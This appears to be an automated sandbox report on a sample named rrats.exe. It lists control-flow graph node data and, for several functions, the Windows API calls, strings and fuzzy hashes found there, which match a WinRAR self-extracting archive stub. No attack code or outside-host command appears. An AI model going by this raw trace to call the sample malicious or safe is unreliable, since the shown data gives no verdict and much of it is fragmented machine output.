19693->19722 19696 e9c84f _abort 28 API calls 19695->19696 19696->19693 19699 e9e105 _abort 38 API calls 19703 ea0d8f 19699->19703 19701 ea0be8 _abort 38 API calls 19701->19702 19725 ea0db1 19702->19725 19704 e9e105 _abort 38 API calls 19703->19704 19703->19705 19704->19705 19729 ea6d20 19705->19729 19709 ea0aaa 19706->19709 19708 e9d6b5 19708->19668 19708->19679 19710 ea0ab6 __FrameHandler3::FrameUnwindToState 19709->19710 19715 e9f5b1 EnterCriticalSection 19710->19715 19712 ea0ac4 19716 ea0af8 19712->19716 19714 ea0aeb _abort 19714->19708 19715->19712 19719 e9f601 LeaveCriticalSection 19716->19719 19718 ea0b02 19718->19714 19719->19718 19720->19691 19721->19695 19723 e9e105 _abort 38 API calls 19722->19723 19724 ea0bed 19723->19724 19724->19701 19726 ea0d80 19725->19726 19727 ea0db7 19725->19727 19726->19699 19726->19703 19726->19705 19732 e9f601 LeaveCriticalSection 19727->19732 19730 e9494c _ValidateLocalCookies 5 API calls 19729->19730 19731 ea6d2a 19730->19731 19731->19731 19732->19726 19733->19632 19737 e9f601 LeaveCriticalSection 19734->19737 19736 ea0566 19736->19632 19737->19736 19739 e98eeb 19738->19739 19740 e98ee1 19738->19740 19739->19740 19741 e9e105 _abort 38 API calls 19739->19741 19740->19641 19740->19642 19742 e98f0c 19741->19742 19746 e9e25a 19742->19746 19747 e9e26d 19746->19747 19748 e98f25 19746->19748 19747->19748 19754 ea16ef 19747->19754 19750 e9e287 19748->19750 19751 e9e29a 19750->19751 19752 e9e2af 19750->19752 19751->19752 19753 ea04ce __fassign 38 API calls 19751->19753 19752->19740 19753->19752 19755 ea16fb __FrameHandler3::FrameUnwindToState 19754->19755 19756 e9e105 _abort 38 API calls 19755->19756 19757 ea1704 19756->19757 19765 ea1752 _abort 19757->19765 19766 e9f5b1 EnterCriticalSection 19757->19766 19759 ea1722 19767 ea1766 19759->19767 19764 e9d6b0 _abort 38 API calls 19764->19765 19765->19748 19766->19759 19768 ea1774 __fassign 19767->19768 19770 ea1736 19767->19770 19768->19770 19774 ea14a2 19768->19774 19771 ea1755 
19770->19771 19848 e9f601 LeaveCriticalSection 19771->19848 19773 ea1749 19773->19764 19773->19765 19776 ea1522 19774->19776 19777 ea14b8 19774->19777 19778 e9d758 _free 20 API calls 19776->19778 19800 ea1570 19776->19800 19777->19776 19782 e9d758 _free 20 API calls 19777->19782 19784 ea14eb 19777->19784 19779 ea1544 19778->19779 19780 e9d758 _free 20 API calls 19779->19780 19785 ea1557 19780->19785 19781 e9d758 _free 20 API calls 19786 ea1517 19781->19786 19788 ea14e0 19782->19788 19783 ea157e 19787 ea15de 19783->19787 19801 e9d758 20 API calls _free 19783->19801 19789 e9d758 _free 20 API calls 19784->19789 19799 ea150d 19784->19799 19790 e9d758 _free 20 API calls 19785->19790 19791 e9d758 _free 20 API calls 19786->19791 19792 e9d758 _free 20 API calls 19787->19792 19802 ea1081 19788->19802 19794 ea1502 19789->19794 19795 ea1565 19790->19795 19791->19776 19798 ea15e4 19792->19798 19830 ea117f 19794->19830 19797 e9d758 _free 20 API calls 19795->19797 19797->19800 19798->19770 19799->19781 19842 ea1615 19800->19842 19801->19783 19803 ea1092 19802->19803 19829 ea117b 19802->19829 19804 ea10a3 19803->19804 19805 e9d758 _free 20 API calls 19803->19805 19806 ea10b5 19804->19806 19807 e9d758 _free 20 API calls 19804->19807 19805->19804 19808 ea10c7 19806->19808 19809 e9d758 _free 20 API calls 19806->19809 19807->19806 19810 ea10d9 19808->19810 19812 e9d758 _free 20 API calls 19808->19812 19809->19808 19811 ea10eb 19810->19811 19813 e9d758 _free 20 API calls 19810->19813 19814 ea10fd 19811->19814 19815 e9d758 _free 20 API calls 19811->19815 19812->19810 19813->19811 19816 ea110f 19814->19816 19817 e9d758 _free 20 API calls 19814->19817 19815->19814 19818 e9d758 _free 20 API calls 19816->19818 19820 ea1121 19816->19820 19817->19816 19818->19820 19819 e9d758 _free 20 API calls 19821 ea1133 19819->19821 19820->19819 19820->19821 19822 e9d758 _free 20 API calls 19821->19822 19824 ea1145 19821->19824 19822->19824 19823 ea1157 19826 ea1169 19823->19826 19827 e9d758 _free 20 API 
calls 19823->19827 19824->19823 19825 e9d758 _free 20 API calls 19824->19825 19825->19823 19828 e9d758 _free 20 API calls 19826->19828 19826->19829 19827->19826 19828->19829 19829->19784 19831 ea118c 19830->19831 19841 ea11e4 19830->19841 19832 ea119c 19831->19832 19833 e9d758 _free 20 API calls 19831->19833 19834 ea11ae 19832->19834 19836 e9d758 _free 20 API calls 19832->19836 19833->19832 19835 ea11c0 19834->19835 19837 e9d758 _free 20 API calls 19834->19837 19838 e9d758 _free 20 API calls 19835->19838 19839 ea11d2 19835->19839 19836->19834 19837->19835 19838->19839 19840 e9d758 _free 20 API calls 19839->19840 19839->19841 19840->19841 19841->19799 19843 ea1622 19842->19843 19847 ea1640 19842->19847 19844 ea1224 __fassign 20 API calls 19843->19844 19843->19847 19845 ea163a 19844->19845 19846 e9d758 _free 20 API calls 19845->19846 19846->19847 19847->19783 19848->19773 19850 ea02f7 19849->19850 19851 ea024d 19849->19851 19854 e9494c _ValidateLocalCookies 5 API calls 19850->19854 19859 ea1308 19851->19859 19856 ea03a3 19854->19856 19856->19659 19858 e9f501 __vsnwprintf_l 43 API calls 19858->19850 19860 e98ece __fassign 38 API calls 19859->19860 19861 ea1328 MultiByteToWideChar 19860->19861 19863 ea13fe 19861->19863 19864 ea1366 19861->19864 19865 e9494c _ValidateLocalCookies 5 API calls 19863->19865 19866 e9da90 __vsnwprintf_l 21 API calls 19864->19866 19869 ea1387 _abort __vsnwprintf_l 19864->19869 19867 ea02ae 19865->19867 19866->19869 19873 e9f501 19867->19873 19868 ea13f8 19878 e9f54c 19868->19878 19869->19868 19871 ea13cc MultiByteToWideChar 19869->19871 19871->19868 19872 ea13e8 GetStringTypeW 19871->19872 19872->19868 19874 e98ece __fassign 38 API calls 19873->19874 19875 e9f514 19874->19875 19882 e9f2e4 19875->19882 19879 e9f558 19878->19879 19880 e9f569 19878->19880 19879->19880 19881 e9d758 _free 20 API calls 19879->19881 19880->19863 19881->19880 19883 e9f2ff __vsnwprintf_l 19882->19883 19884 e9f325 MultiByteToWideChar 19883->19884 19885 e9f4d9 
19884->19885 19886 e9f34f 19884->19886 19887 e9494c _ValidateLocalCookies 5 API calls 19885->19887 19889 e9da90 __vsnwprintf_l 21 API calls 19886->19889 19892 e9f370 __vsnwprintf_l 19886->19892 19888 e9f4ec 19887->19888 19888->19858 19889->19892 19890 e9f3b9 MultiByteToWideChar 19891 e9f425 19890->19891 19893 e9f3d2 19890->19893 19895 e9f54c __freea 20 API calls 19891->19895 19892->19890 19892->19891 19909 e9f8ec 19893->19909 19895->19885 19910 e9f618 _abort 5 API calls 19909->19910 19911 e9f913 19910->19911 19914 e9f91c 19911->19914 19917 e9f974 19911->19917 19923 e9ffda __FrameHandler3::FrameUnwindToState 19922->19923 19930 e9f5b1 EnterCriticalSection 19923->19930 19925 e9ffe4 19931 ea0039 19925->19931 19929 e9fffd _abort 19930->19925 19943 ea0761 19931->19943 19933 ea0087 19934 ea0761 __vsnwprintf_l 26 API calls 19933->19934 19935 ea00a3 19934->19935 19936 ea0761 __vsnwprintf_l 26 API calls 19935->19936 19937 ea00c1 19936->19937 19938 e9fff1 19937->19938 19939 e9d758 _free 20 API calls 19937->19939 19940 ea0005 19938->19940 19939->19938 19957 e9f601 LeaveCriticalSection 19940->19957 19942 ea000f 19942->19929 19944 ea0772 19943->19944 19947 ea076e __InternalCxxFrameHandler 19943->19947 19945 ea0779 19944->19945 19949 ea078c _abort 19944->19949 19946 e9da7d __dosmaperr 20 API calls 19945->19946 19948 ea077e 19946->19948 19947->19933 19950 e9d95c ___std_exception_copy 26 API calls 19948->19950 19949->19947 19951 ea07ba 19949->19951 19952 ea07c3 19949->19952 19950->19947 19953 e9da7d __dosmaperr 20 API calls 19951->19953 19952->19947 19955 e9da7d __dosmaperr 20 API calls 19952->19955 19954 ea07bf 19953->19954 19956 e9d95c ___std_exception_copy 26 API calls 19954->19956 19955->19954 19956->19947 19957->19942 19959 e98ece __fassign 38 API calls 19958->19959 19960 ea07f6 19959->19960 19960->19216 20072 e93ac0 19961->20072 19964 e86c13 19966 e86f40 GetModuleFileNameW 19964->19966 20083 e9bf0d 19964->20083 19965 e86bb4 GetProcAddress 19967 e86bcd 19965->19967 19968 
[Control-flow graph data: the rendered graph is not recoverable from this page; the extracted node list covers basic blocks in the 0x00E81xxx-0x00EA6xxx range of rrats.exe, annotated with the Win32 and CRT APIs each block calls (GetProcAddress, GetModuleFileNameW, CreateFileW, ReadFile, AllocConsole, AttachConsole, ExitProcess, OleInitialize, GdiplusStartup, SHGetMalloc, LoadResource, CreateStreamOnHGlobal, SetEnvironmentVariableW, ShellExecuteExW, WaitForInputIdle, GetExitCodeProcess, DeleteFileW, MoveFileExW, SHFileOperationW, CreateFileMappingW, MapViewOfFile, DialogBoxParamW, TlsAlloc, TlsFree, among others).]

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00E86B8F: GetModuleHandleW.KERNEL32(kernel32), ref: 00E86BA8
                                                                • Part of subcall function 00E86B8F: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E86BBA
                                                                • Part of subcall function 00E86B8F: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E86BEB
                                                                • Part of subcall function 00E8F86D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E8F875
                                                                • Part of subcall function 00E8FE36: OleInitialize.OLE32(00000000), ref: 00E8FE4F
                                                                • Part of subcall function 00E8FE36: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E8FE86
                                                                • Part of subcall function 00E8FE36: SHGetMalloc.SHELL32(00ECEA00), ref: 00E8FE90
                                                              • GetCommandLineW.KERNEL32 ref: 00E92F36
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E92F5D
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E92F6E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00E92FA8
                                                                • Part of subcall function 00E92BF6: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00E92C0C
                                                                • Part of subcall function 00E92BF6: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E92C48
                                                              • CloseHandle.KERNEL32(00000000), ref: 00E92FB1
                                                              • GetModuleFileNameW.KERNEL32(00000000,00EE52D8,00000800), ref: 00E92FCC
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00EE52D8), ref: 00E92FD8
                                                              • GetLocalTime.KERNEL32(?), ref: 00E92FE3
                                                              • _swprintf.LIBCMT ref: 00E93022
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E93034
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00E9303B
                                                              • LoadIconW.USER32(00000000,00000064), ref: 00E93052
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00010830,00000000), ref: 00E930A3
                                                              • Sleep.KERNEL32(?), ref: 00E930D1
                                                              • DeleteObject.GDI32 ref: 00E9310A
                                                              • DeleteObject.GDI32(?), ref: 00E9311A
                                                              • CloseHandle.KERNEL32 ref: 00E9315D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$B*$C:\Users\user\AppData\Local\Temp\RarSFX0$D+$STARTDLG$X+$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                              • API String ID: 3049964643-2342504919
                                                              • Opcode ID: 041517af24f22e49e11087fe996b4badc7f7d43a6315e0d69e02d033489bab4b
                                                              • Instruction ID: bf886f3208fdca4d644cebf7cb004a6984ef4a9c387350f1988d4f99cef0ca5a
                                                              • Opcode Fuzzy Hash: 041517af24f22e49e11087fe996b4badc7f7d43a6315e0d69e02d033489bab4b
                                                              • Instruction Fuzzy Hash: 5C61E671605344AFD710BB73EC8AF6B77E8EB59704F001029F609B62A2DA759D4DCB21
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E82B22
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800), ref: 00E82B50
                                                              • GetLastError.KERNEL32(?,?,00000800), ref: 00E82B5C
                                                              • FindNextFileW.KERNEL32(?,?), ref: 00E82B86
                                                              • GetLastError.KERNEL32 ref: 00E82B92
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: c9216e40e23e5c1da2cdc7bb6c45e1f76ddd08742fb5c0c924273a48b46d52cd
                                                              • Instruction ID: d310679421d6dd814d4dbbe0ca577975367d725f51c287fa58051645a01d9b9c
                                                              • Opcode Fuzzy Hash: c9216e40e23e5c1da2cdc7bb6c45e1f76ddd08742fb5c0c924273a48b46d52cd
                                                              • Instruction Fuzzy Hash: 31415071901555AFCB25EF64CCC8AE9B3B8BB48350F14469AE96DF3200D734AE94CF50
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000003,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002,00000000,?,00E9D6F2,00000003), ref: 00E9C754
                                                              • TerminateProcess.KERNEL32(00000000,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002,00000000,?,00E9D6F2,00000003), ref: 00E9C75B
                                                              • ExitProcess.KERNEL32 ref: 00E9C76D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: ad0b5e8a4745587185dff4fc1bbe40cffa30bcc951bc7b088aa33b876d675f64
                                                              • Instruction ID: 2c05b8962c448f159a0ef34d43168c021fc013fb94f358a9a89bdca27ed91e46
                                                              • Opcode Fuzzy Hash: ad0b5e8a4745587185dff4fc1bbe40cffa30bcc951bc7b088aa33b876d675f64
                                                              • Instruction Fuzzy Hash: F0E04631000208AFCF017FA1DF48A483BA9EB59745F200015FA08AA121CB35EC46CA80
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E90835
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E90921
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E9093F
                                                              • IsDialogMessageW.USER32(?,?), ref: 00E90952
                                                              • TranslateMessage.USER32(?), ref: 00E90960
                                                              • DispatchMessageW.USER32(?), ref: 00E9096A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00E9098D
                                                              • EndDialog.USER32(?,00000001), ref: 00E909B0
                                                              • GetDlgItem.USER32(?,00000068), ref: 00E909D3
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E909EE
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00EA8574), ref: 00E90A01
                                                                • Part of subcall function 00E92491: _wcschr.LIBVCRUNTIME ref: 00E9249A
                                                                • Part of subcall function 00E92491: _wcslen.LIBCMT ref: 00E924BB
                                                              • SetFocus.USER32(00000000), ref: 00E90A08
                                                              • _swprintf.LIBCMT ref: 00E90A74
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                                • Part of subcall function 00E92512: GetDlgItem.USER32(00000068,00EE6300), ref: 00E92526
                                                                • Part of subcall function 00E92512: ShowWindow.USER32(00000000,00000005,?,?,?,00E90065,00000001,?,?,00E907F9,00EA9D3C,00EE6300,00EE6300,00001000,00000000,00000000), ref: 00E9254E
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E92559
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000C2,00000000,00EA8574), ref: 00E92567
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E9257D
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E92597
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E925DB
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E925E9
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E925F8
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E9261F
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000C2,00000000,00EA8ECC), ref: 00E9262E
                                                              • GetLastError.KERNEL32(00000000,?), ref: 00E90AB8
                                                              • GetLastError.KERNEL32(?,00000000,?), ref: 00E90AE0
                                                              • GetTickCount.KERNEL32 ref: 00E90AFE
                                                              • _swprintf.LIBCMT ref: 00E90B12
                                                              • GetLastError.KERNEL32 ref: 00E90B44
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,?), ref: 00E90B93
                                                              • _swprintf.LIBCMT ref: 00E90BCC
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00E90C20
                                                              • GetCommandLineW.KERNEL32 ref: 00E90C3A
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00E90C97
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00E90CBF
                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00E90CF5
                                                              • Sleep.KERNEL32(00000064), ref: 00E90D09
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00E90D32
                                                              • CloseHandle.KERNEL32(00000000), ref: 00E90D3B
                                                              • _swprintf.LIBCMT ref: 00E90D6E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E90DCD
                                                              • SetDlgItemTextW.USER32(?,00000065,00EA8574), ref: 00E90DE4
                                                              • GetDlgItem.USER32(?,00000065), ref: 00E90DED
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E90DFC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E90E0B
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E90EB8
                                                              • _wcslen.LIBCMT ref: 00E90F0E
                                                              • _swprintf.LIBCMT ref: 00E90F38
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E90F82
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00E90F9C
                                                              • GetDlgItem.USER32(?,00000068), ref: 00E90FA5
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E90FBB
                                                              • GetDlgItem.USER32(?,00000066), ref: 00E90FD5
                                                              • SetWindowTextW.USER32(00000000,00ED0A42), ref: 00E90FF7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E9104C
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E9105F
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_00010600,00000000,?), ref: 00E91102
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00E911DC
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E9121E
                                                                • Part of subcall function 00E9177D: __EH_prolog.LIBCMT ref: 00E91782
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E91242
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l_wcschr
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$83$8$<$@$B$B*$D+$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                              • API String ID: 270980416-131512099
                                                              • Opcode ID: f38dc2a30636470563a9c2e4af49866bc80c146981b08fb5983f74b22579eee4
                                                              • Instruction ID: 310e6a4c3f462207fa24251432d4d911160d9341f5750c854de258fc370865b2
                                                              • Opcode Fuzzy Hash: f38dc2a30636470563a9c2e4af49866bc80c146981b08fb5983f74b22579eee4
                                                              • Instruction Fuzzy Hash: 5B423771941349BEEF21ABB19C89FBE37FCAB05704F401195F248BA1E2C7B55A49CB21

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E91782
                                                                • Part of subcall function 00E90354: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E9043B
                                                                • Part of subcall function 00E900F6: _wcschr.LIBVCRUNTIME ref: 00E90191
                                                              • _wcslen.LIBCMT ref: 00E91A48
                                                              • _wcslen.LIBCMT ref: 00E91A51
                                                              • SetWindowTextW.USER32(?,?), ref: 00E91AAF
                                                              • _wcslen.LIBCMT ref: 00E91AF1
                                                              • _wcsrchr.LIBVCRUNTIME ref: 00E91C39
                                                              • GetDlgItem.USER32(?,00000066), ref: 00E91C74
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00E91C84
                                                              • SendMessageW.USER32(00000000,00000143,00000000,00ED0A42), ref: 00E91C92
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E91CBD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$@4$B$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$T4
                                                              • API String ID: 986293930-2881898191
                                                              • Opcode ID: e1e2b125ff9f68998416021a8b8fa917dafeed6f75e764c1464ed029eceddc46
                                                              • Instruction ID: aeb1c43717166c8031c17ae9cd4b02d583dae13a724bcc42f81ff63a7f70bce4
                                                              • Opcode Fuzzy Hash: e1e2b125ff9f68998416021a8b8fa917dafeed6f75e764c1464ed029eceddc46
                                                              • Instruction Fuzzy Hash: ABE17072900259AADF24EBA0DD85EEE73FCAF05314F5050A6F649F7051EB749E84CB60

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00E86BA8
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E86BBA
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E86BEB
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E86E95
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E86EAF
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E86EBF
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00EA8828,00000000), ref: 00E86EDD
                                                              • CloseHandle.KERNEL32(00000000), ref: 00E86F35
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E86F4A
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00EA8828,?,00000000,?,00000800), ref: 00E86F9E
                                                              • GetFileAttributesW.KERNEL32(?,?,00EA8828,00000800,?,00000000,?,00000800), ref: 00E86FC8
                                                              • GetFileAttributesW.KERNEL32(?,?,00EA88F0,00000800), ref: 00E87004
                                                                • Part of subcall function 00E86B47: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                                • Part of subcall function 00E86B47: LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              • _swprintf.LIBCMT ref: 00E87076
                                                              • _swprintf.LIBCMT ref: 00E870C2
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • AllocConsole.KERNEL32 ref: 00E870CA
                                                              • GetCurrentProcessId.KERNEL32 ref: 00E870D4
                                                              • AttachConsole.KERNEL32(00000000), ref: 00E870DB
                                                              • _wcslen.LIBCMT ref: 00E870F0
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E87101
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00E87108
                                                              • Sleep.KERNEL32(00002710), ref: 00E87113
                                                              • FreeConsole.KERNEL32 ref: 00E87119
                                                              • ExitProcess.KERNEL32 ref: 00E87121
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
